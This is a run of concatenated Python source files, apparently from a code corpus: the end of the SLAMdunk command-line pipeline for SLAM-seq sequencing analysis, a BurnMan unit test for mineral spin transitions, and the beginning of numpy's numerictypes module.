with open(fileName, "r") as ins:
for line in ins:
line = line.strip()
if(len(line) > 1):
if(fileName.endswith(".tsv")):
cols = line.split("\t")
elif(fileName.endswith(".csv")):
cols = line.split(",")
else:
raise RuntimeError("Unknown file extension found: " + fileName)
if(len(cols) < 4):
raise RuntimeError("Invalid sample file found: " + fileName)
samples.append(cols[0])
infos.append(cols[1] + ":" + cols[2] + ":" + cols[3])
return samples, infos
def getSamples(bams, runOnly=-1):
samples = []
samplesInfos = []
if len(bams) == 1 and (bams[0].endswith(".tsv") or bams[0].endswith(".csv")):
# Sample file specified
samples, samplesInfos = readSampleFile(bams[0])
else:
# List of BAM files specified
samples = bams
samplesInfos = [""] * len(samples)
if(runOnly > 0):
if(runOnly > len(samples)):
raise RuntimeError("Sample index out of range. " + str(runOnly) + " > " + str(len(samples)) + ". Check -i/--sample-index")
message("Running only job " + str(runOnly))
samples = [ samples[runOnly - 1] ]
samplesInfos = [ samplesInfos[runOnly - 1] ]
elif(runOnly == 0):
raise RuntimeError("Sample index (" + str(runOnly) + ") out of range. Starts with 1. Check -i/--sample-index")
return samples, samplesInfos
def runMap(tid, inputBAM, referenceFile, threads, trim5p, maxPolyA, quantseqMapping, endtoendMapping, topn, sampleDescription, outputDirectory, skipSAM) :
if skipSAM:
outputSAM = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".bam", "_slamdunk_mapped"))
else:
outputSAM = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".sam", "_slamdunk_mapped"))
outputLOG = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".log", "_slamdunk_mapped"))
#sampleName = "sample_" + str(tid)
sampleName = replaceExtension(basename(inputBAM), ".bam", "")
sampleType = "NA"
sampleTime = "-1"
if(sampleDescription != ""):
sampleDescriptions = sampleDescription.split(":")
if(len(sampleDescriptions) >= 1):
sampleName = sampleDescriptions[0]
if(len(sampleDescriptions) >= 2):
typeDict = { 'p': 'pulse', 'c':'chase', 'pulse':'pulse', 'chase':'chase', '':'NA'}
if sampleDescriptions[1] in typeDict:
sampleType = typeDict[sampleDescriptions[1]]
else:
sampleType = sampleDescriptions[1]
if(len(sampleDescriptions) >= 3):
sampleTime = sampleDescriptions[2]
mapper.Map(inputBAM, referenceFile, outputSAM, getLogFile(outputLOG), quantseqMapping, endtoendMapping, threads=threads, trim5p=trim5p, maxPolyA=maxPolyA, topn=topn, sampleId=tid, sampleName=sampleName, sampleType=sampleType, sampleTime=sampleTime, printOnly=printOnly, verbose=verbose)
stepFinished()
def runSam2Bam(tid, bam, threads, outputDirectory):
inputSAM = os.path.join(outputDirectory, replaceExtension(basename(bam), ".sam", "_slamdunk_mapped"))
outputBAM = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bam", "_slamdunk_mapped"))
outputLOG = os.path.join(outputDirectory, replaceExtension(basename(bam), ".log", "_slamdunk_mapped"))
mapper.sort(inputSAM, outputBAM, getLogFile(outputLOG), threads, False, printOnly, verbose)
stepFinished()
def runDedup(tid, bam, outputDirectory) :
outputBAM = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bam", "_dedup"))
outputLOG = os.path.join(outputDirectory, replaceExtension(basename(bam), ".log", "_dedup"))
log = getLogFile(outputLOG)
deduplicator.Dedup(bam, outputBAM, log)
closeLogFile(log)
stepFinished()
def runFilter(tid, bam, bed, mq, minIdentity, maxNM, outputDirectory):
outputBAM = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bam", "_filtered"))
outputLOG = os.path.join(outputDirectory, replaceExtension(basename(bam), ".log", "_filtered"))
filter.Filter(bam, outputBAM, getLogFile(outputLOG), bed, mq, minIdentity, maxNM, printOnly, verbose)
stepFinished()
def runSnp(tid, referenceFile, minCov, minVarFreq, minQual, inputBAM, outputDirectory) :
outputSNP = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".vcf", "_snp"))
outputLOG = os.path.join(outputDirectory, replaceExtension(basename(inputBAM), ".log", "_snp"))
snps.SNPs(inputBAM, outputSNP, referenceFile, minVarFreq, minCov, minQual, getLogFile(outputLOG), printOnly, verbose, False)
stepFinished()
def runCount(tid, bam, ref, bed, maxLength, minQual, conversionThreshold, outputDirectory, snpDirectory, vcfFile) :
outputCSV = os.path.join(outputDirectory, replaceExtension(basename(bam), ".tsv", "_tcount"))
outputBedgraphPlus = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bedgraph", "_tcount_plus"))
outputBedgraphMinus = os.path.join(outputDirectory, replaceExtension(basename(bam), ".bedgraph", "_tcount_mins"))
outputLOG = os.path.join(outputDirectory, replaceExtension(basename(bam), ".log", "_tcount"))
if (vcfFile != None) :
inputSNP = vcfFile
elif(snpDirectory != None):
inputSNP = os.path.join(snpDirectory, replaceExtension(basename(bam), ".vcf", "_snp"))
else:
inputSNP = None
if (maxLength == None) :
maxLength = estimateMaxReadLength(bam)
if (maxLength < 0) :
print("Difference between minimum and maximum read length is > 10. Please specify --max-read-length parameter.")
sys.exit(0)
log = getLogFile(outputLOG)
print("Using " + str(maxLength) + " as maximum read length.",file=log)
tcounter.computeTconversions(ref, bed, inputSNP, bam, maxLength, minQual, outputCSV, outputBedgraphPlus, outputBedgraphMinus, conversionThreshold, log)
stepFinished()
return outputCSV
def runAll(args) :
message("slamdunk all")
if args.sampleIndex > -1:
sec = random.randrange(200,2000) / 1000.0
message("Waiting " + str(sec) + " seconds")
sleep(sec)
# Setup slamdunk run folder
outputDirectory = args.outputDir
createDir(outputDirectory)
n = args.threads
referenceFile = args.referenceFile
# Run mapper dunk
dunkPath = os.path.join(outputDirectory, "map")
createDir(dunkPath)
samples, samplesInfos = getSamples(args.files, runOnly=args.sampleIndex)
message("Running slamDunk map for " + str(len(samples)) + " files (" + str(n) + " threads)")
for i in range(0, len(samples)):
bam = samples[i]
if not args.sampleName or len(samples) > 1:
sampleName = replaceExtension(basename(bam), "", "")
else :
sampleName = args.sampleName
sampleInfo = samplesInfos[i]
if sampleInfo == "":
sampleInfo = sampleName + ":" + args.sampleType + ":" + str(args.sampleTime)
tid = i
if args.sampleIndex > -1:
tid = args.sampleIndex
runMap(tid, bam, referenceFile, n, args.trim5, args.maxPolyA, args.quantseq, args.endtoend, args.topn, sampleInfo, dunkPath, args.skipSAM)
dunkFinished()
if(not args.skipSAM):
message("Running slamDunk sam2bam for " + str(len(samples)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=1, verbose=verbose)(delayed(runSam2Bam)(tid, samples[tid], n, dunkPath) for tid in range(0, len(samples)))
dunkFinished()
dunkbufferIn = []
for file in samples :
dunkbufferIn.append(os.path.join(dunkPath, replaceExtension(basename(file), ".bam", "_slamdunk_mapped")))
# Run filter dunk
bed = args.bed
if args.filterbed:
bed = args.filterbed
args.multimap = True
if (not args.multimap) :
bed = None
dunkPath = os.path.join(outputDirectory, "filter")
createDir(dunkPath)
message("Running slamDunk filter for " + str(len(samples)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runFilter)(tid, dunkbufferIn[tid], bed, args.mq, args.identity, args.nm, dunkPath) for tid in range(0, len(samples)))
dunkFinished()
# Run filter dunk
dunkbufferOut = []
for file in dunkbufferIn :
dunkbufferOut.append(os.path.join(dunkPath, replaceExtension(basename(file), ".bam", "_filtered")))
dunkbufferIn = dunkbufferOut
dunkbufferOut = []
dunkFinished()
# Run snps dunk only if vcf not specified
snpDirectory = None
vcfFile = None
if not "vcfFile" in args:
dunkPath = os.path.join(outputDirectory, "snp")
createDir(dunkPath)
minCov = args.cov
minVarFreq = args.var
snpThread = n
if(snpThread > 1):
snpThread = int(snpThread / 2)
#if (args.minQual == 0) :
# snpqual = 13
#else :
snpqual = args.minQual
message("Running slamDunk SNP for " + str(len(samples)) + " files (" + str(snpThread) + " threads)")
results = Parallel(n_jobs=snpThread, verbose=verbose)(delayed(runSnp)(tid, referenceFile, minCov, minVarFreq, snpqual, dunkbufferIn[tid], dunkPath) for tid in range(0, len(samples)))
snpDirectory = os.path.join(outputDirectory, "snp")
dunkFinished()
else :
vcfFile = args.vcfFile
# Run count dunk
dunkPath = os.path.join(outputDirectory, "count")
createDir(dunkPath)
message("Running slamDunk tcount for " + str(len(samples)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runCount)(tid, dunkbufferIn[tid], referenceFile, args.bed, args.maxLength, args.minQual, args.conversionThreshold, dunkPath, snpDirectory, vcfFile) for tid in range(0, len(samples)))
dunkFinished()
def run():
########################################################################
# Argument parsing
########################################################################
# Info
usage = "SLAMdunk software for analyzing SLAM-seq data"
# Main Parsers
parser = ArgumentParser(description=usage, formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
# Initialize Subparsers
subparsers = parser.add_subparsers(help="", dest="command")
# map command
mapparser = subparsers.add_parser('map', help='Map SLAM-seq read data', formatter_class=ArgumentDefaultsHelpFormatter)
mapparser.add_argument('files', action='store', help='Single csv/tsv file (recommended) containing all sample files and sample info or a list of all sample BAM/FASTA(gz)/FASTQ(gz) files' , nargs="+")
mapparser.add_argument("-r", "--reference", type=str, required=True, dest="referenceFile", default=SUPPRESS, help="Reference fasta file")
mapparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", default=SUPPRESS, help="Output directory for mapped BAM files.")
mapparser.add_argument("-5", "--trim-5p", type=int, required=False, dest="trim5", default=12, help="Number of bp removed from 5' end of all reads.")
mapparser.add_argument("-n", "--topn", type=int, required=False, dest="topn", default=1, help="Max. number of alignments to report per read")
mapparser.add_argument("-a", "--max-polya", type=int, required=False, dest="maxPolyA", default=4, help="Max number of As at the 3' end of a read.")
mapparser.add_argument("-t", "--threads", type=int, required=False, dest="threads", default = 1, help="Thread number")
mapparser.add_argument("-q", "--quantseq", dest="quantseq", action='store_true', required=False, help="Run plain Quantseq alignment without SLAM-seq scoring")
mapparser.add_argument('-e', "--endtoend", action='store_true', dest="endtoend", help="Use a end to end alignment algorithm for mapping.")
mapparser.add_argument('-sn', "--sampleName", type=str, dest="sampleName", required = False, help="Use this sample name for all supplied samples")
mapparser.add_argument('-sy', "--sampleType", type=str, dest="sampleType", required = False, default = "pulse", help="Use this sample type for all supplied samples")
mapparser.add_argument('-st', "--sampleTime", type=int, dest="sampleTime", required = False, default = 0, help="Use this sample time for all supplied samples")
mapparser.add_argument("-i", "--sample-index", type=int, required=False, default=-1, dest="sampleIndex", help="Run analysis only for sample <i>. Use for distributing slamdunk analysis on a cluster (index is 1-based).")
mapparser.add_argument('-ss', "--skip-sam", action='store_true', dest="skipSAM", help="Output BAM while mapping. Slower but, uses less hard disk.")
# filter command
filterparser = subparsers.add_parser('filter', help='Filter SLAM-seq aligned data')
filterparser.add_argument('bam', action='store', help='Bam file(s)' , nargs="+")
filterparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", help="Output directory for mapped BAM files.")
filterparser.add_argument("-b", "--bed", type=str, required=False, dest="bed", help="BED file, overrides MQ filter to 0")
filterparser.add_argument("-mq", "--min-mq", type=int, required=False, default=2, dest="mq", help="Minimum mapping quality (default: %(default)d)")
filterparser.add_argument("-mi", "--min-identity", type=float, required=False, default=0.95, dest="identity", help="Minimum alignment identity (default: %(default)s)")
filterparser.add_argument("-nm", "--max-nm", type=int, required=False, default=-1, dest="nm", help="Maximum NM for alignments (default: %(default)d)")
filterparser.add_argument("-t", "--threads", type=int, required=False, dest="threads", default=1, help="Thread number (default: %(default)d)")
# snp command
snpparser = subparsers.add_parser('snp', help='Call SNPs on SLAM-seq aligned data', formatter_class=ArgumentDefaultsHelpFormatter)
snpparser.add_argument('bam', action='store', help='Bam file(s)' , nargs="+")
snpparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", default=SUPPRESS, help="Output directory for mapped BAM files.")
snpparser.add_argument("-r", "--reference", required=True, dest="fasta", type=str, default=SUPPRESS, help="Reference fasta file")
snpparser.add_argument("-c", "--min-coverage", required=False, dest="cov", type=int, help="Minimimum coverage to call variant", default=10)
#snpparser.add_argument("-q", "--min-base-qual", type=int, default=13, required=False, dest="minQual", help="Min base quality for T -> C conversions (default: %(default)d)")
snpparser.add_argument("-f", "--var-fraction", required=False, dest="var", type=float, help="Minimimum variant fraction to call variant", default=0.8)
snpparser.add_argument("-t", "--threads", type=int, required=False, default=1, dest="threads", help="Thread number")
# count command
countparser = subparsers.add_parser('count', help='Count T/C conversions in SLAM-seq aligned data')
countparser.add_argument('bam', action='store', help='Bam file(s)' , nargs="+")
countparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", default=SUPPRESS, help="Output directory for mapped BAM files.")
countparser.add_argument("-s", "--snp-directory", type=str, required=False, dest="snpDir", default=SUPPRESS, help="Directory containing SNP files.")
countparser.add_argument("-v", "--vcf", type=str, required=False, dest="vcfFile", default=SUPPRESS, help="Externally provided custom variant file.")
countparser.add_argument("-r", "--reference", type=str, required=True, dest="ref", default=SUPPRESS, help="Reference fasta file")
countparser.add_argument("-b", "--bed", type=str, required=True, dest="bed", default=SUPPRESS, help="BED file")
countparser.add_argument("-c", "--conversion-threshold", type=int, dest="conversionThreshold", required=False, default=1,help="Number of T>C conversions required to count read as T>C read (default: %(default)d)")
countparser.add_argument("-l", "--max-read-length", type=int, required=False, dest="maxLength", help="Max read length in BAM file")
countparser.add_argument("-q", "--min-base-qual", type=int, default=27, required=False, dest="minQual", help="Min base quality for T -> C conversions (default: %(default)d)")
countparser.add_argument("-t", "--threads", type=int, required=False, default=1, dest="threads", help="Thread number (default: %(default)d)")
# all command
allparser = subparsers.add_parser('all', help='Run entire SLAMdunk analysis')
allparser.add_argument('files', action='store', help='Single csv/tsv file (recommended) containing all sample files and sample info or a list of all sample BAM/FASTA(gz)/FASTQ(gz) files' , nargs="+")
allparser.add_argument("-r", "--reference", type=str, required=True, dest="referenceFile", help="Reference fasta file")
allparser.add_argument("-b", "--bed", type=str, required=True, dest="bed", help="BED file with 3'UTR coordinates")
allparser.add_argument("-fb", "--filterbed", type=str, required=False, dest="filterbed", help="BED file with 3'UTR coordinates to filter multimappers (activates -m)")
allparser.add_argument("-v", "--vcf", type=str, required=False, dest="vcfFile", default=SUPPRESS, help="Skip SNP step and provide custom variant file.")
allparser.add_argument("-o", "--outputDir", type=str, required=True, dest="outputDir", help="Output directory for slamdunk run.")
allparser.add_argument("-5", "--trim-5p", type=int, required=False, dest="trim5", default=12, help="Number of bp removed from 5' end of all reads (default: %(default)s)")
allparser.add_argument("-a", "--max-polya", type=int, required=False, dest="maxPolyA", default=4, help="Max number of As at the 3' end of a read (default: %(default)s)")
allparser.add_argument("-n", "--topn", type=int, required=False, dest="topn", default=1, help="Max. number of alignments to report per read (default: %(default)s)")
allparser.add_argument("-t", "--threads", type=int, required=False, default=1, dest="threads", help="Thread number (default: %(default)s)")
allparser.add_argument("-q", "--quantseq", dest="quantseq", action='store_true', required=False, help="Run plain Quantseq alignment without SLAM-seq scoring")
allparser.add_argument('-e', "--endtoend", action='store_true', dest="endtoend", help="Use a end to end alignment algorithm for mapping.")
allparser.add_argument('-m', "--multimap", action='store_true', dest="multimap", help="Use reference to resolve multimappers (requires -n > 1).")
allparser.add_argument("-mq", "--min-mq", type=int, required=False, default=2, dest="mq", help="Minimum mapping quality (default: %(default)s)")
allparser.add_argument("-mi", "--min-identity", type=float, required=False, default=0.95, dest="identity", help="Minimum alignment identity (default: %(default)s)")
allparser.add_argument("-nm", "--max-nm", type=int, required=False, default=-1, dest="nm", help="Maximum NM for alignments (default: %(default)s)")
allparser.add_argument("-mc", "--min-coverage", required=False, dest="cov", type=int, help="Minimimum coverage to call variant (default: %(default)s)", default=10)
allparser.add_argument("-mv", "--var-fraction", required=False, dest="var", type=float, help="Minimimum variant fraction to call variant (default: %(default)s)", default=0.8)
allparser.add_argument("-c", "--conversion-threshold", type=int, dest="conversionThreshold", required=False, default=1,help="Number of T>C conversions required to count read as T>C read (default: %(default)d)")
allparser.add_argument("-rl", "--max-read-length", type=int, required=False, dest="maxLength", help="Max read length in BAM file")
allparser.add_argument("-mbq", "--min-base-qual", type=int, default=27, required=False, dest="minQual", help="Min base quality for T -> C conversions (default: %(default)d)")
allparser.add_argument('-sn', "--sampleName", type=str, dest="sampleName", required = False, help="Use this sample name for all supplied samples")
allparser.add_argument('-sy', "--sampleType", type=str, dest="sampleType", required = False, default = "pulse", help="Use this sample type for all supplied samples")
allparser.add_argument('-st', "--sampleTime", type=int, dest="sampleTime", required = False, default = 0, help="Use this sample time for all supplied samples")
allparser.add_argument("-i", "--sample-index", type=int, required=False, default=-1, dest="sampleIndex", help="Run analysis only for sample <i>. Use for distributing slamdunk analysis on a cluster (index is 1-based).")
allparser.add_argument("-ss", "--skip-sam", action='store_true', dest="skipSAM", help="Output BAM while mapping. Slower but, uses less hard disk.")
args = parser.parse_args()
########################################################################
# Routine selection
########################################################################
command = args.command
if (command == "map") :
mapper.checkNextGenMapVersion()
outputDirectory = args.outputDir
if args.sampleIndex > -1:
sec = random.randrange(0,2000) / 1000
message("Waiting " + str(sec) + " seconds")
sleep(sec)
createDir(outputDirectory)
n = args.threads
referenceFile = args.referenceFile
samples, samplesInfos = getSamples(args.files, runOnly=args.sampleIndex)
message("Running slamDunk map for " + str(len(samples)) + " files (" + str(n) + " threads)")
for i in range(0, len(samples)):
bam = samples[i]
if not args.sampleName or len(samples) > 1:
sampleName = replaceExtension(basename(bam), "", "")
else :
sampleName = args.sampleName
sampleInfo = samplesInfos[i]
if sampleInfo == "":
sampleInfo = sampleName + ":" + args.sampleType + ":" + str(args.sampleTime)
tid = i
if args.sampleIndex > -1:
tid = args.sampleIndex
runMap(tid, bam, referenceFile, n, args.trim5, args.maxPolyA, args.quantseq, args.endtoend, args.topn, sampleInfo, outputDirectory, args.skipSAM)
dunkFinished()
if not args.skipSAM:
message("Running slamDunk sam2bam for " + str(len(samples)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=1, verbose=verbose)(delayed(runSam2Bam)(tid, samples[tid], n, outputDirectory) for tid in range(0, len(samples)))
dunkFinished()
elif (command == "filter") :
outputDirectory = args.outputDir
createDir(outputDirectory)
n = args.threads
message("Running slamDunk filter for " + str(len(args.bam)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runFilter)(tid, args.bam[tid], args.bed, args.mq, args.identity, args.nm, outputDirectory) for tid in range(0, len(args.bam)))
dunkFinished()
elif (command == "snp") :
outputDirectory = args.outputDir
createDir(outputDirectory)
fasta = args.fasta
minCov = args.cov
minVarFreq = args.var
#minQual = args.minQual
minQual = 15
n = args.threads
if(n > 1):
n = int(n / 2)
message("Running slamDunk SNP for " + str(len(args.bam)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runSnp)(tid, fasta, minCov, minVarFreq, minQual, args.bam[tid], outputDirectory) for tid in range(0, len(args.bam)))
dunkFinished()
elif (command == "count") :
outputDirectory = args.outputDir
createDir(outputDirectory)
if "snpDir" in args:
snpDirectory = args.snpDir
else :
snpDirectory = None
if "vcfFile" in args:
vcfFile = args.vcfFile
else :
vcfFile = None
n = args.threads
message("Running slamDunk tcount for " + str(len(args.bam)) + " files (" + str(n) + " threads)")
results = Parallel(n_jobs=n, verbose=verbose)(delayed(runCount)(tid, args.bam[tid], args.ref, args.bed, args.maxLength, args.minQual, args.conversionThreshold, outputDirectory, snpDirectory, vcfFile) for tid in range(0, len(args.bam)))
dunkFinished()
elif (command == "all") :
runAll(args)
dunkFinished()
else:
parser.error("Too few arguments.")
if __name__ == '__main__':
run()
|
QuLogic/burnman
|
refs/heads/master
|
tests/test_spin.py
|
1
|
import unittest
from util import BurnManTest
import os, sys
sys.path.insert(1,os.path.abspath('..'))
import burnman
from burnman import minerals
class spin_transition(BurnManTest):
def test_new(self):
mins = [minerals.Murakami_etal_2012.fe_periclase(), minerals.Murakami_etal_2012.fe_periclase_HS(), minerals.Murakami_etal_2012.fe_periclase_LS()]
for p in mins:
p.set_method('slb2')
#print "HS regime: (on/high/low)"
for p in mins:
p.set_state(5e9, 300)
#print p.v_s()
f,c = mins[0].unroll()
self.assertFloatEqual(c[0].v_s(), mins[1].v_s())
#print "LS regime: (on/high/low)"
for p in mins:
p.set_state(70e9, 300)
#print p.v_s()
f,c = mins[0].unroll()
self.assertFloatEqual(c[0].v_s(), mins[2].v_s())
def test_no_set_state(self):
m = minerals.Murakami_etal_2012.fe_periclase()
m.set_state(5e9, 300)
self.assertIsInstance(m.unroll()[1][0], minerals.Murakami_etal_2012.fe_periclase_HS)
m.set_state(70e9, 300)
self.assertIsInstance(m.unroll()[1][0], minerals.Murakami_etal_2012.fe_periclase_LS)
class TestHelperSolidSolution(BurnManTest):
def test1(self):
m = minerals.other.ferropericlase(0.1)
m.set_state(5e9, 300)
self.assertFloatEqual(m.v_s(), 5821.42007777)
m = minerals.other.ferropericlase(0.7)
m.set_state(5e9, 300)
self.assertFloatEqual(m.v_s(), 4061.92139873)
class TestHelperFEdep(BurnManTest):
def test(self):
weight_percents = {'Mg':0.213, 'Fe': 0.08, 'Si':0.27, 'Ca':0., 'Al':0.}
Kd_0 = .59 #Fig 5 Nakajima et al 2012
phase_fractions, relative_molar_percent = burnman. \
calculate_phase_percents(weight_percents)
iron_content = lambda p,t: burnman.calculate_partition_coefficient \
(p,t,relative_molar_percent,Kd_0)
rock = burnman.Composite([phase_fractions['pv'], phase_fractions['fp']],
[minerals.SLB_2005.mg_fe_perovskite_pt_dependent(iron_content,0),
minerals.SLB_2005.ferropericlase_pt_dependent(iron_content,1)])
rock.set_state(5e9, 300)
fractions, mins = rock.unroll()
self.assertArraysAlmostEqual(fractions, [0.9428714062806316, 0.057128593719368403])
self.assertIsInstance(mins[0], minerals.SLB_2005.mg_fe_perovskite)
self.assertIsInstance(mins[1], minerals.SLB_2005.ferropericlase)
self.assertFloatEqual(mins[0].molar_mass(), 0.101752790682)
rock.set_state(7e9, 700)
fractions, mins = rock.unroll()
self.assertFloatEqual(mins[0].molar_mass(), 0.104161162508)
if __name__ == '__main__':
unittest.main()
|
haripradhan/MissionPlanner
|
refs/heads/master
|
Lib/site-packages/numpy/core/numerictypes.py
|
54
|
"""
numerictypes: Define the numeric type objects
This module is designed so "from numerictypes import \\*" is safe.
Exported symbols include:
Dictionary with all registered number types (including aliases):
typeDict
Type objects (not all will be available, depends on platform):
see variable sctypes for which ones you have
Bit-width names
int8 int16 int32 int64 int128
uint8 uint16 uint32 uint64 uint128
float16 float32 float64 float96 float128 float256
complex32 complex64 complex128 complex192 complex256 complex512
datetime64 timedelta64
c-based names
bool_
object_
void, str_, unicode_
byte, ubyte,
short, ushort
intc, uintc,
intp, uintp,
int_, uint,
longlong, ulonglong,
single, csingle,
float_, complex_,
longfloat, clongfloat,
datetime_, timedelta_, (these inherit from timeinteger which inherits
from signedinteger)
As part of the type-hierarchy: xx -- is bit-width
generic
+-> bool_ (kind=b)
+-> number (kind=i)
| integer
| signedinteger (intxx)
| byte
| short
| intc
| intp int0
| int_
| longlong
+-> unsignedinteger (uintxx) (kind=u)
| ubyte
| ushort
| uintc
| uintp uint0
| uint_
| ulonglong
+-> inexact
| +-> floating (floatxx) (kind=f)
| | single
| | float_ (double)
| | longfloat
| \\-> complexfloating (complexxx) (kind=c)
| csingle (singlecomplex)
| complex_ (cfloat, cdouble)
| clongfloat (longcomplex)
+-> flexible
| character
| void (kind=V)
|
| str_ (string_, bytes_) (kind=S) [Python 2]
| unicode_ (kind=U) [Python 2]
|
| bytes_ (string_) (kind=S) [Python 3]
| str_ (unicode_) (kind=U) [Python 3]
|
\\-> object_ (not used much) (kind=O)
"""
# we add more at the bottom
__all__ = ['sctypeDict', 'sctypeNA', 'typeDict', 'typeNA', 'sctypes',
'ScalarType', 'obj2sctype', 'cast', 'nbytes', 'sctype2char',
'maximum_sctype', 'issctype', 'typecodes', 'find_common_type',
'issubdtype']
from numpy.core.multiarray import typeinfo, ndarray, array, empty, dtype
import types as _types
import sys
# we don't export these for import *, but we do want them accessible
# as numerictypes.bool, etc.
from __builtin__ import bool, int, long, float, complex, object, unicode, str
from numpy.compat import bytes
if sys.version_info[0] >= 3:
# Py3K
class long(int):
# Placeholder class -- this will not escape outside numerictypes.py
pass
# String-handling utilities to avoid locale-dependence.
# "import string" is costly to import!
# Construct the translation tables directly
# "A" = chr(65), "a" = chr(97)
_all_chars = map(chr, range(256))
_ascii_upper = _all_chars[65:65+26]
_ascii_lower = _all_chars[97:97+26]
LOWER_TABLE="".join(_all_chars[:65] + _ascii_lower + _all_chars[65+26:])
UPPER_TABLE="".join(_all_chars[:97] + _ascii_upper + _all_chars[97+26:])
#import string
# assert (string.maketrans(string.ascii_uppercase, string.ascii_lowercase) == \
# LOWER_TABLE)
# assert (string.maketrnas(string_ascii_lowercase, string.ascii_uppercase) == \
# UPPER_TABLE)
#LOWER_TABLE = string.maketrans(string.ascii_uppercase, string.ascii_lowercase)
#UPPER_TABLE = string.maketrans(string.ascii_lowercase, string.ascii_uppercase)
def english_lower(s):
""" Apply English case rules to convert ASCII strings to all lower case.
This is an internal utility function to replace calls to str.lower() such
that we can avoid changing behavior with changing locales. In particular,
Turkish has distinct dotted and dotless variants of the Latin letter "I" in
both lowercase and uppercase. Thus, "I".lower() != "i" in a "tr" locale.
Parameters
----------
s : str
Returns
-------
lowered : str
Examples
--------
>>> from numpy.core.numerictypes import english_lower
>>> english_lower('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_')
'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789_'
>>> english_lower('')
''
"""
lowered = s.translate(LOWER_TABLE)
return lowered
def english_upper(s):
""" Apply English case rules to convert ASCII strings to all upper case.
This is an internal utility function to replace calls to str.upper() such
that we can avoid changing behavior with changing locales. In particular,
Turkish has distinct dotted and dotless variants of the Latin letter "I" in
both lowercase and uppercase. Thus, "i".upper() != "I" in a "tr" locale.
Parameters
----------
s : str
Returns
-------
uppered : str
Examples
--------
>>> from numpy.core.numerictypes import english_upper
>>> english_upper('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_')
'ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'
>>> english_upper('')
''
"""
uppered = s.translate(UPPER_TABLE)
return uppered
def english_capitalize(s):
""" Apply English case rules to convert the first character of an ASCII
string to upper case.
This is an internal utility function to replace calls to str.capitalize()
such that we can avoid changing behavior with changing locales.
Parameters
----------
s : str
Returns
-------
capitalized : str
Examples
--------
>>> from numpy.core.numerictypes import english_capitalize
>>> english_capitalize('int8')
'Int8'
>>> english_capitalize('Int8')
'Int8'
>>> english_capitalize('')
''
"""
if s:
return english_upper(s[0]) + s[1:]
else:
return s
sctypeDict = {} # Contains all leaf-node scalar types with aliases
sctypeNA = {} # Contails all leaf-node types -> numarray type equivalences
allTypes = {} # Collect the types we will add to the module here
def _evalname(name):
k = 0
for ch in name:
if ch in '0123456789':
break
k += 1
try:
bits = int(name[k:])
except ValueError:
bits = 0
base = name[:k]
return base, bits
def bitname(obj):
"""Return a bit-width name for a given type object"""
name = obj.__name__
base = ''
char = ''
if name[:6] == "numpy.":
name = name[6:]
try:
if name[-1] == '_':
newname = name[:-1]
else:
newname = name
info = typeinfo[english_upper(newname)]
assert(info[-1] == obj) # sanity check
bits = info[2]
except KeyError: # bit-width name
base, bits = _evalname(name)
char = base[0]
if name == 'bool_':
char = 'b'
base = 'bool'
elif name=='void':
char = 'V'
base = 'void'
elif name=='object_':
char = 'O'
base = 'object'
bits = 0
if sys.version_info[0] >= 3:
if name=='bytes_':
char = 'S'
base = 'bytes'
elif name=='str_':
char = 'U'
base = 'str'
else:
if name=='string_':
char = 'S'
base = 'string'
elif name=='unicode_':
char = 'U'
base = 'unicode'
bytes = bits // 8
if char != '' and bytes != 0:
char = "%s%d" % (char, bytes)
return base, bits, char
def _add_types():
for a in typeinfo.keys():
name = english_lower(a)
if isinstance(typeinfo[a], tuple):
typeobj = typeinfo[a][-1]
# define C-name and insert typenum and typechar references also
allTypes[name] = typeobj
sctypeDict[name] = typeobj
sctypeDict[typeinfo[a][0]] = typeobj
sctypeDict[typeinfo[a][1]] = typeobj
else: # generic class
allTypes[name] = typeinfo[a]
_add_types()
def _add_aliases():
for a in typeinfo.keys():
name = english_lower(a)
if not isinstance(typeinfo[a], tuple):
continue
typeobj = typeinfo[a][-1]
# insert bit-width version for this class (if relevant)
base, bit, char = bitname(typeobj)
if base[-3:] == 'int' or char[0] in 'ui': continue
if base != '':
myname = "%s%d" % (base, bit)
if (name != 'longdouble' and name != 'clongdouble') or \
myname not in allTypes.keys():
allTypes[myname] = typeobj
sctypeDict[myname] = typeobj
if base == 'complex':
na_name = '%s%d' % (english_capitalize(base), bit//2)
elif base == 'bool':
na_name = english_capitalize(base)
sctypeDict[na_name] = typeobj
else:
na_name = "%s%d" % (english_capitalize(base), bit)
sctypeDict[na_name] = typeobj
sctypeNA[na_name] = typeobj
sctypeDict[na_name] = typeobj
sctypeNA[typeobj] = na_name
sctypeNA[typeinfo[a][0]] = na_name
if char != '':
sctypeDict[char] = typeobj
sctypeNA[char] = na_name
_add_aliases()
# Integers handled so that
# The int32, int64 types should agree exactly with
# PyArray_INT32, PyArray_INT64 in C
# We need to enforce the same checking as is done
# in arrayobject.h where the order of getting a
# bit-width match is:
# long, longlong, int, short, char
# for int8, int16, int32, int64, int128
def _add_integer_aliases():
_ctypes = ['LONG', 'LONGLONG', 'INT', 'SHORT', 'BYTE']
for ctype in _ctypes:
val = typeinfo[ctype]
bits = val[2]
